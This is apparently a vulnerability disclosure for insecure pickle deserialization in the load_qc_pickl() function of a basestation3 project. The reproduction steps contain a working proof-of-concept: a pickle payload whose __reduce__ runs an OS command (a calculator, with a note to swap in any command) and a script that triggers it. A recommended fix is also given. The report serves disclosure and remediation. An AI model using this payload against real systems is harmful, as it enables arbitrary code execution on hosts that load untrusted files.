### Key Information Summary #### Vulnerability Description - **Vulnerability Type**: Remote Code Execution (RCE) - **Cause**: Insecure deserialization via `pickle.load()` in the `load_qc_pickl()` function, leading to arbitrary code execution. #### Impact - **Arbitrary Code Execution** - **Remote System Compromise**: If the attacker can control `qc_file` #### Affected Component - **File**: QC.py - **Function**: load_qc_pickl(qc_file) - **Issue**: `pickle.load()` used without input validation #### Reproduction Steps 1. Clone the repository: `git clone https://github.com/iop-api-uw/basestation3` 2. Navigate to the `basestation3` directory: `cd basestation3` 3. Create a malicious `qc.pkl` file: ```python import pickle import os class Evil: def __reduce__(self): return (os.system, ("gnome-calculator",)) # Replace with any OS command payload = pickle.dumps(Evil()) with open("qc.pkl", "wb") as f: f.write(payload) ``` 4. Create and run `exploit.py`: ```python from QC import load_qc_pickl load_qc_pickl("/root/CVE/qc.pkl") ``` #### Recommended Fix - Avoid using `pickle` to load untrusted data. - If serialization/deserialization is necessary, use secure alternatives such as `json.load()` or custom binary formats, along with proper validation.